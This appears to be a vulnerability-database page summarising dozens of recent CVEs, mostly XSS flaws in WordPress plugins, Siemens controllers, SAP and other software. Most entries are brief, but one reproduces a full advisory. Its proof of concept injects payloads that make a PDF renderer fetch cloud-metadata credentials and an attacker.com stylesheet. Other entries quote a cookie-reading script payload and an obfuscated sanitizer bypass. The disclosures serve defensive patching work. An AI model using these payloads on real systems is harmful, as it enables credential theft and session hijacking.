Unauthenticated arbitrary file read in dalfox REST API server mode allows remote attackers to exfiltrate sensitive files from the host filesystem. The vulnerability chains two flaws: missing authentication middleware when no API key is set (default configuration), and unsanitized deserialization of the `custom-payload-file` JSON parameter directly into the scan engine. Remote attackers can supply any file path (e.g., `/etc/passwd`, `~/.ssh/id_rsa`, cloud credential files) and the engine reads each line, embeds it as an XSS payload, and transmits it to an attacker-controlled HTTP endpoint via dalfox's own scan traffic. No exploit code is publicly identified at time of analysis; vendor-released patch available in version 2.13.0.

Authentication Bypass XSS Privilege Escalation
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-45087 Go CRITICAL POC PATCH GHSA Act Now

Unauthenticated remote code execution in Dalfox REST API server mode (versions ≤2.12.0) allows network attackers to execute arbitrary OS commands by injecting shell payloads via the `found-action` parameter in POST /scan requests. The server binds to 0.0.0.0:6664 by default with no API key enforcement unless explicitly configured, and deserializes attacker-controlled JSON directly into execution-control options without sanitization. Attackers trivially guarantee exploitation by hosting a reflective XSS endpoint to trigger the injected command. Fixed in version 2.13.0. CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). EPSS data not available; no CISA KEV listing at time of analysis. Public exploit code exists (detailed proof-of-concept published in GitHub advisory GHSA-v25v-m36w-jp4h).

Denial Of Service Command Injection Authentication Bypass XSS RCE +1
NVD GitHub
CVSS 3.1
10.0
EPSS
0.0%
CVE-2026-6813 MEDIUM This Month

Stored cross-site scripting (XSS) in the Continually WordPress plugin versions up to 4.3.1 allows authenticated administrators to inject arbitrary web scripts into admin settings that execute whenever users access affected pages. The vulnerability requires high-privilege administrator access and is limited to multisite WordPress installations or sites with unfiltered_html disabled, resulting in low CVSS impact (4.4) despite network accessibility. No public exploit code or active exploitation has been identified at this time.

XSS WordPress
NVD
CVSS 3.1
4.4
EPSS
0.0%
CVE-2026-6800 MEDIUM This Month

Stored Cross-Site Scripting in FastBots plugin for WordPress up to version 1.0.12 allows authenticated administrators to inject arbitrary JavaScript into admin settings that executes when any user accesses affected pages. The vulnerability requires high-privilege administrator access and affects only multi-site WordPress installations or single-site installations with the unfiltered_html capability disabled. No public exploit code or active exploitation has been identified at time of analysis.

XSS WordPress
NVD
CVSS 3.1
4.4
EPSS
0.0%
CVE-2026-33862 HIGH CISA Act Now

Stored cross-site scripting (XSS) in Siemens Teamcenter allows authenticated attackers with low privileges to inject malicious JavaScript that executes in other users' browser sessions, enabling session hijacking, credential theft, or unauthorized actions within the product lifecycle management platform. Affects Teamcenter versions V2312 through V2512 with vendor patches released for all branches. CVSS v4.0 scores 8.5 (High) due to network attack vector with low complexity, though exploitation requires user interaction and authenticated access. No public exploit code or CISA KEV listing identified at time of analysis.

XSS Teamcenter V2312 Teamcenter V2406 Teamcenter V2412 Teamcenter V2506 +1
NVD VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-25789 HIGH CISA Act Now

Cross-site scripting (XSS) in Siemens SIMATIC S7-1500 PLC family firmware upload interface allows authenticated attackers to execute malicious JavaScript in administrator sessions via crafted filenames. This stored XSS requires social engineering to trick authenticated users into selecting the attacker-supplied firmware file on the web-based management interface. Successful exploitation enables session hijacking and credential theft without requiring the malicious file to be uploaded. EPSS data not provided, no CISA KEV status confirmed, affecting industrial automation controllers widely deployed in critical infrastructure environments.

XSS Simatic Drive Controller Cpu 1504D Tf Simatic Drive Controller Cpu 1507D Tf Simatic Et 200Sp Cpu 1510Sp F 1 Pn Simatic Et 200Sp Cpu 1510Sp 1 Pn +95
NVD VulDB
CVSS 4.0
7.2
EPSS
0.1%
CVE-2026-25787 CRITICAL CISA Emergency

Stored cross-site scripting (XSS) in Siemens SIMATIC S7-1500 and ET 200SP controller families allows authenticated attackers with high privileges to inject malicious scripts via Technology Object (TO) names when downloading TIA Portal projects. The scripts execute when authorized users access the Motion Control Diagnostics web interface page, enabling session hijacking, credential theft, or privileged actions performed under the victim's context. This affects over 100 product variants across industrial automation controllers, software controllers, and open controllers. No active exploitation confirmed (not in CISA KEV). EPSS score not provided in dataset. CVSS 4.0 score of 9.3 reflects high impact across confidentiality, integrity, and availability in both vulnerable and subsequent systems.

XSS Simatic Drive Controller Cpu 1504D Tf Simatic Drive Controller Cpu 1507D Tf Simatic Et 200Sp Cpu 1510Sp F 1 Pn Simatic Et 200Sp Cpu 1510Sp 1 Pn +95
NVD VulDB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-25786 CRITICAL CISA Emergency

Stored cross-site scripting in Siemens SIMATIC S7-1500 controller family web interface allows authenticated high-privilege attackers to inject malicious code via crafted PLC/station names in TIA project files. When users with appropriate rights later access the communication parameters page, injected scripts execute in their session context with high impact to confidentiality, integrity, and availability across system boundaries (CVSS 9.3, CVSS:4.0 S:H). No public exploit identified at time of analysis, but CVSS vector indicates low attack complexity (AC:L) once attacker gains privileged project upload access.

XSS Simatic Drive Controller Cpu 1504D Tf Simatic Drive Controller Cpu 1507D Tf Simatic Et 200Sp Cpu 1510Sp F 1 Pn Simatic Et 200Sp Cpu 1510Sp 1 Pn +95
NVD VulDB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-2300 MEDIUM This Month

Stored Cross-Site Scripting in BJ Lazy Load plugin for WordPress versions up to 1.0.9 allows authenticated attackers with Contributor-level access to inject arbitrary web scripts via regex-based HTML attribute manipulation in the `filter_images()` function. The vulnerability exploits improper handling of HTML attribute boundaries during `src` attribute replacement, enabling attackers to promote malicious content from class attribute values into executable DOM attributes. When victims access injected pages, the injected scripts execute in their browsers with the privileges of the compromised site.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-6247 MEDIUM This Month

Stored Cross-Site Scripting in Scratchblocks for WP plugin for WordPress allows authenticated contributors and above to inject arbitrary JavaScript through the 'element' attribute of the 'scratchblocks' shortcode due to insufficient input sanitization and output escaping. The vulnerability affects all versions up to 1.0.1 and enables malicious scripts to execute in the browsers of all users viewing affected pages, with cross-site scope impact.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-7464 MEDIUM This Month

Reflected Cross-Site Scripting (XSS) in WP Google Maps Integration plugin for WordPress versions up to 1.2 allows unauthenticated attackers to inject arbitrary web scripts via the `page` parameter due to insufficient input sanitization and output escaping. Exploitation requires tricking an administrator into clicking a malicious link, but successful attacks can hijack admin sessions, modify site content, or steal credentials with medium attack complexity and limited immediate confidentiality and integrity impact.

XSS WordPress Google
NVD VulDB
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-6256 MEDIUM This Month

Stored Cross-Site Scripting in Credits Shortcode WordPress plugin up to version 1.2 allows authenticated contributors and above to inject arbitrary JavaScript via the 'link' attribute of the credits shortcode, which executes when other users view affected pages. The vulnerability stems from insufficient input sanitization and output escaping on user-supplied shortcode attributes. CVSS 6.4 reflects moderate risk with network vector and limited scope impact, though real-world risk depends on site contributor population and user awareness.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-7659 MEDIUM This Month

Stored cross-site scripting in the Advanced Social Media Icons WordPress plugin through version 1.2 allows authenticated contributors and above to inject arbitrary JavaScript via insufficiently sanitized shortcode attributes, with execution occurring whenever any user views an affected page. The vulnerability affects all installations of the plugin up to and including version 1.2 and requires only Contributor-level WordPress access to exploit, making it a significant risk for multi-author sites.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-5715 MEDIUM This Month

Stored Cross-Site Scripting in Voyage Plus WordPress plugin versions up to 1.0.6 allows authenticated contributors and above to inject malicious scripts via the 'class' attribute of the 'post-content' shortcode due to insufficient input sanitization and output escaping. Injected scripts execute in the browsers of all users viewing affected pages, enabling credential theft, session hijacking, or malware distribution. No public exploit code or active KEV listing identified at time of analysis, but the vulnerability requires only contributor-level access and no user interaction, making it practical for insider threats or compromised contributor accounts.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-4920 MEDIUM This Month

Stored Cross-Site Scripting in Next Date WordPress plugin (all versions up to 1.0) allows authenticated contributors and above to inject arbitrary JavaScript into pages via the 'default' shortcode attribute due to insufficient input sanitization and output escaping. Injected scripts execute in the context of any user viewing the affected page, potentially compromising site visitors and administrators. No public exploit code or active exploitation has been identified at time of analysis.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-4859 MEDIUM This Month

SP Blog Designer plugin for WordPress versions up to 1.0.0 allows authenticated attackers with Contributor-level access to inject arbitrary web scripts via the 'design' attribute of the wpsbd_post_carousel shortcode, resulting in stored cross-site scripting (XSS) that executes for all users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping in shortcode handling. No public exploit code or active exploitation has been confirmed at time of analysis.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-6237 MEDIUM This Month

Stored cross-site scripting in Quick Table plugin for WordPress allows authenticated contributors and above to inject malicious scripts via the 'style' attribute of the 'qtbl' shortcode, which execute when any user views the affected page. The vulnerability affects all versions up to 1.0.0 due to insufficient input sanitization and output escaping. No public exploit code or active exploitation has been identified at time of analysis.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-6690 HIGH This Week

Stored XSS in LifePress WordPress plugin allows unauthenticated remote attackers to inject malicious scripts that execute in administrator contexts when viewing the plugin's settings page. The vulnerability affects all versions through 2.2.2 and stems from a publicly-accessible AJAX endpoint (lp_update_mds) that lacks both nonce verification and capability checks, combined with improper input sanitization of the 'n' parameter. The CVSS score of 7.2 reflects network-based exploitation requiring no authentication or user interaction, with changed scope enabling cross-context attacks. EPSS and KEV data not available; exploitation probability depends on attacker knowledge of the specific AJAX action endpoint.

XSS WordPress
NVD
CVSS 3.1
7.2
EPSS
0.1%
CVE-2026-7437 MEDIUM This Month

Reflected Cross-Site Scripting in AzonPost WordPress plugin versions up to 1.3 allows unauthenticated attackers to inject arbitrary JavaScript via the `editpos_hidden` parameter, executing in the browsers of administrators who click malicious links. The vulnerability stems from insufficient input sanitization and output escaping, requiring user interaction but affecting all versions of the plugin without requiring authentication or special configuration.

XSS WordPress
NVD
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-3604 MEDIUM This Month

Stored Cross-Site Scripting (XSS) in WP SEO Structured Data Schema plugin for WordPress versions up to 2.8.1 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the `_kcseo_ative_tab` parameter, which executes in the browsers of users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping in the plugin's metadata handling. No public exploit code or active exploitation has been identified at time of analysis.

XSS WordPress
NVD
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-7661 MEDIUM This Month

Stored cross-site scripting in the Bootstrap Shortcode plugin for WordPress allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript into pages via the `box` shortcode, executing malicious scripts whenever users view affected pages. The vulnerability exists in all versions up to 1.0 due to insufficient input sanitization and output escaping. No public exploit code or active exploitation has been identified at this time.

XSS WordPress Bootstrap
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-5340 MEDIUM This Month

Stored Cross-Site Scripting in Fancy Image Show plugin for WordPress up to version 9.1 allows authenticated contributors and above to inject arbitrary JavaScript via the `fancy-img-show` shortcode due to insufficient input sanitization and output escaping. The injected scripts execute in the context of any user viewing the affected page, affecting site integrity and potentially compromising administrative accounts. No public exploit code or active exploitation has been confirmed at time of analysis.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-6808 MEDIUM This Month

Reflected Cross-Site Scripting in Pricing Tables for WP plugin allows unauthenticated attackers to inject arbitrary JavaScript via the 'page' parameter. The vulnerability affects all versions up to 1.1.0 due to insufficient input sanitization and output escaping. Exploitation requires social engineering (e.g., tricking an administrator into clicking a malicious link), but no public exploit code or active exploitation has been identified at time of analysis.

XSS WordPress
NVD
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-6913 MEDIUM This Month

Stored cross-site scripting in Shortcodely WordPress plugin versions up to 1.0.1 allows authenticated contributors and above to inject arbitrary JavaScript into pages via the 'widget_area' parameter, with scripts executing whenever users access affected pages. The vulnerability stems from insufficient input sanitization and output escaping, affecting all installations with vulnerable plugin versions active. CVSS 6.4 reflects the cross-site scope and information disclosure potential, though exploitation requires authenticated contributor-level access.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-40137 MEDIUM This Month

SAP Business Server Pages TAF_APPLAUNCHER contains a cross-site scripting vulnerability that allows unauthenticated attackers to craft malicious links redirecting users to attacker-controlled sites, potentially exposing or altering sensitive information. The vulnerability requires user interaction (clicking the link) and affects confidentiality and integrity with a CVSS score of 6.1. No active exploitation has been publicly confirmed at time of analysis.

XSS SAP
NVD
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-27682 MEDIUM This Month

Reflected cross-site scripting (XSS) in SAP NetWeaver Application Server ABAP (Business Server Pages) allows unauthenticated attackers to inject malicious scripts via unprotected URL parameters. Successful exploitation requires victim interaction (clicking a crafted link) and affects confidentiality and integrity of application data. No public exploit code or active exploitation reported at time of analysis.

XSS SAP
NVD VulDB
CVSS 3.1
4.7
EPSS
0.0%
CVE-2025-70842 MEDIUM This Month

Stored cross-site scripting (XSS) in FluentCMS 1.2.3 File Management module allows authenticated administrators to upload SVG files with embedded malicious JavaScript that executes when any user-including unauthenticated visitors-accesses the image URL directly. The vulnerability has public proof-of-concept code available via GitHub pull request, and CISA SSVC framework confirms exploitability is feasible but requires user interaction and is not automatable. CVSS 5.4 reflects the attack complexity introduced by authentication requirement and user interaction, but the cross-origin scope and ability to affect multiple users elevates real-world risk.

XSS
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-43900 CRITICAL PATCH Act Now

DeepChat is an open-source artificial intelligence agent platform that unifies models, tools, and agents. Prior to v1.0.4-beta.1, a Cross-Site Scripting (XSS) vulnerability exists due to a discrepancy between the backend validation layer and the frontend browser rendering engine. The SVGSanitizer (src/main/lib/svgSanitizer.ts) restricts script execution by scrubbing javascript: protocols using plain-text regular expressions. However, it fails to account for HTML entity decoding prior to Vue's v-html DOM insertion inside the SvgArtifact.vue component. By feeding an SVG artifact with obfuscated entities (e.g., j&#x61;vascript:alert(1)), an attacker can completely bypass the sanitizer, culminating in arbitrary JavaScript execution when a victim interacts with the rendered SVG Element. This vulnerability is fixed in v1.0.4-beta.1.

XSS Deepchat
NVD GitHub
CVSS 3.1
9.3
EPSS
0.0%
CVE-2026-43887 HIGH PATCH This Week

Outline is a service that allows for collaborative documentation. From 0.84.0 to 1.6.1, the Outline comment section permits users to mention other users; however, the backend does not validate or sanitize the href attribute associated with these mentions. As a result, potentially dangerous protocols (e.g., javascript:) are not filtered, introducing a risk of client-side code execution. This vulnerability is fixed in 1.7.0.

XSS RCE Outline
NVD GitHub
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-28971 MEDIUM PATCH This Month

The issue was addressed with improved UI handling. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, visionOS 26.5. A malicious iframe may use another website’s download settings.

XSS Apple
NVD VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-42887 MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Audiobookshelf prior to 2.33.0 allows authenticated administrators to inject malicious HTML and JavaScript into the authLoginCustomMessage field via the /api/auth-settings endpoint, which is then rendered on the login page for all users without sanitization. This enables attackers with admin credentials to capture user credentials, perform account takeover, or redirect users to phishing sites. No public exploit code identified at time of analysis.

XSS Audiobookshelf
NVD GitHub
CVSS 3.1
4.5
EPSS
0.0%
CVE-2026-44657 PHP HIGH PATCH GHSA This Week

Using *show_inline=1* parameter and a valid *file_show_inline_token* CSRF token on file_download.php, an attacker can execute code by uploading a crafted XHTML attachment referencing a JavaScript attachment. ### Impact Cross-site scripting ### Patches - 26647b2e68ba30b9d7987d4e03d7a16416684bc2 ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.

XSS PHP CSRF
NVD GitHub VulDB
CVSS 4.0
7.5
EPSS
0.1%
CVE-2026-44655 PHP HIGH PATCH GHSA This Week

Unescaped Project Name allows an attacker that can set it (which typically requires manager or administrator access level) to inject HTML in Move Attachments admin page. ### Impact Cross-site scripting (XSS). This is mitigated by Content Security Policy which restricts scripts execution. ### Patches - 5cb4b469295889f5d2b01677c9bf82c143e0fdaa ### Workarounds None

XSS
NVD GitHub VulDB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2026-43979 PyPI MEDIUM PATCH GHSA This Month

## Summary `PDFService._markdown_to_html()` constructs an HTML document by interpolating user-controlled values - specifically `title` (sourced from `research.title` or `research.query`) and `metadata` key-value pairs - directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in `ssrf_validator.py`. --- ## Details **Vulnerable code:** `src/local_deep_research/web/services/pdf_service.py`, lines 171-176 ```python # pdf_service.py:171-176 if title: html_parts.append(f"<title>{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- ## Proof of Concept **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- ## Impact ### 1. Chained SSRF (High Severity) By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure - enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) - enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** - if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. ### 2. HTML Document Structure Corruption Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. ### 3. CSS Injection (Medium Severity) By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. ### 4. Affected Scope - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user - no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- ## Remediation Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` - local-deep-research, branch `main`.* --- ## Maintainer note (2026-04-24) Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) - closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) - implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML - markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** - upgrade to v1.6.0 or later to receive both fixes.

Denial Of Service SSRF Microsoft XSS Python
NVD GitHub VulDB
CVSS 3.1
5.0
EPSS
0.0%
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting (XSS) vulnerability in mistune's render_toc_ul() function allows attackers to inject arbitrary HTML and JavaScript into table-of-contents output by crafting malicious heading IDs. When heading identifiers are derived from user-supplied text (standard practice for readable slug anchors), an attacker can break out of the href attribute context with a payload like `x"><script>alert(document.cookie)</script><a href="`, causing the script block to execute in the rendered TOC. The vulnerability requires user interaction (UI:R) to view the poisoned TOC but affects all users of the generated page. Vendor-released patch available in mistune 3.2.1.

XSS Apple Python +1
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Flowsint prior to version 1.2.3 allows remote attackers to inject arbitrary HTML into node descriptions within sketches, which is executed when the node is selected by a user. This requires user interaction to view the malicious node but can compromise investigation integrity and potentially lead to credential theft or malware delivery within the OSINT analysis workflow.

XSS Flowsint
NVD GitHub VulDB
EPSS 0% CVSS 2.3
LOW Monitor

HCL AION fails to configure security-related HTTP response headers, potentially reducing browser-based protections against cross-site scripting and other client-side attacks. The vulnerability requires adjacent network access, high interaction complexity, low privilege authentication, and user interaction to achieve limited confidentiality impact. CVSS score of 2.3 reflects minimal real-world risk under current attack conditions.

XSS Aion
NVD
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Cross-site scripting (XSS) in Open OnDemand prior to versions 4.0.11, 4.1.5, and 4.2.2 allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers via specially crafted filenames displayed in the file browser interface. The vulnerability requires user interaction (clicking or viewing the malicious filename) and results in limited scope impact affecting only the confidentiality and integrity of the user's session. No public exploit code has been identified at time of analysis.

XSS
NVD GitHub
EPSS 0% CVSS 9.0
CRITICAL PATCH Act Now

Stored Cross-Site Scripting (XSS) in vCluster Platform allows authenticated attackers with namespace creation privileges to inject malicious scripts via the templateRef name field, potentially escalating to Global-Admin access. The vulnerability affects versions prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0. With a CVSS score of 9.0 and changed scope (S:C), this represents a critical privilege escalation path in Kubernetes multi-tenancy environments. No active exploitation confirmed by CISA KEV at time of analysis, but the low attack complexity (AC:L) and clear attack path make this an immediate patching priority for organizations running vCluster Platform.

Kubernetes XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Stored cross-site scripting in Vvveb before 1.0.8.3 allows unauthenticated attackers to inject arbitrary HTML and JavaScript via the username field during customer signup, which persists in the display_name column and executes when rendered without encoding in vulnerable views. The vulnerability requires user interaction (visiting a page displaying the attacker's injected display_name) and affects confidentiality and integrity with CVSS 5.3. No public exploit code or active exploitation has been reported at time of analysis.

XSS
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Verba is affected by a Stored Cross-Site Scripting (XSS) vulnerability within its login logging mechanism. When an unauthenticated remote attacker attempts to log in using an incorrect username and password combination, the supplied username value is recorded in the application logs. Due to lack of input sanitization, an attacker can inject a malicious XSS payload into the username field. This payload will be executed in the context of the administrator’s browser when the admin accesses the web application's log viewer. The vendor was notified early about this vulnerability, but didn't respond to our messages. This issue was fixed in version 10.0.6

XSS Verba
NVD VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in WEBCON BPS via the '/openinmobileapp' endpoint allows unauthenticated attackers to inject arbitrary JavaScript that executes in authenticated users' browsers when a crafted URL is opened. The vulnerability requires user interaction (clicking a link) but impacts session confidentiality and integrity. Vendor-released patches are available for versions 2026.1.3.109 and 2025.2.1.293.

XSS Webcon Bps
NVD
EPSS 0% CVSS 5.1
MEDIUM POC PATCH This Month

Reflected cross-site scripting in podinfo through 6.11.2 allows remote unauthenticated attackers to execute arbitrary JavaScript in the context of a victim's browser session by crafting HTML pages with auto-submitting forms that deliver script payloads to the /echo or /api/echo endpoints. The vulnerability exists because the echoHandler writes request body content directly to the response without setting explicit Content-Type or X-Content-Type-Options headers, causing Go's content type detection to default to text/html. Publicly available exploit code confirms the vulnerability is exploitable, though CISA KEV status is not confirmed at the time of analysis.

XSS Podinfo
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM This Month

Stored cross-site scripting (XSS) in Stel Order v3.25.1 and earlier allows unauthenticated remote attackers to inject persistent malicious JavaScript via the 'legalName' and 'employeeID' parameters at the '/app/FrontController' endpoint. When administrators or other users access affected sections, injected code executes in their browsers with user interaction, enabling session hijacking and account takeover. SSVC framework rates this as automatable but only partial technical impact with no confirmed active exploitation.

XSS Stel Order
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Royal Elementor Addons and Templates plugin for WordPress up to version 1.7.1058 allows authenticated attackers with Contributor-level privileges to inject arbitrary JavaScript via the 'title_tag' parameter in multiple widgets, with execution occurring when any user accesses the affected page. The vulnerability stems from insufficient input sanitization and output escaping on user-controlled parameters.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in CC Child Pages WordPress plugin up to version 2.1.1 allows authenticated attackers with Contributor-level access and above to inject arbitrary JavaScript via the 'more' parameter, which executes in the browsers of users viewing the compromised pages. CVSS 6.4 reflects the authentication gate but cross-site scope (C:L/I:L/S:C). No public exploit code or active exploitation confirmed at time of analysis.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Meta Field Block WordPress plugin (versions ≤1.5.2) allows authenticated contributors to inject persistent malicious scripts via the unsanitized 'tagName' block attribute. Any user who subsequently visits a page containing the injected block will execute the attacker's arbitrary JavaScript in their browser context. A vendor-released patch (1.5.3) is available; no public exploit has been identified and EPSS and SSVC signals both indicate low exploitation probability at this time.

XSS WordPress Meta Field Block Display Custom Fields In The Block Editor Without Coding
NVD
EPSS 0% CVSS 7.2
HIGH This Week

Stored cross-site scripting in the ManageWP Worker WordPress plugin (versions ≤ 4.9.31) allows unauthenticated remote attackers to inject arbitrary JavaScript via a crafted 'MWP-Key-Name' HTTP request header, which executes when an administrator later visits the plugin's connection management page with debug parameters. No public exploit identified at time of analysis, and the EPSS score is very low (0.07%, 22nd percentile), but the unauthenticated network attack vector and changed scope (S:C) keep this relevant for any site using the plugin.

XSS WordPress Managewp Worker
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

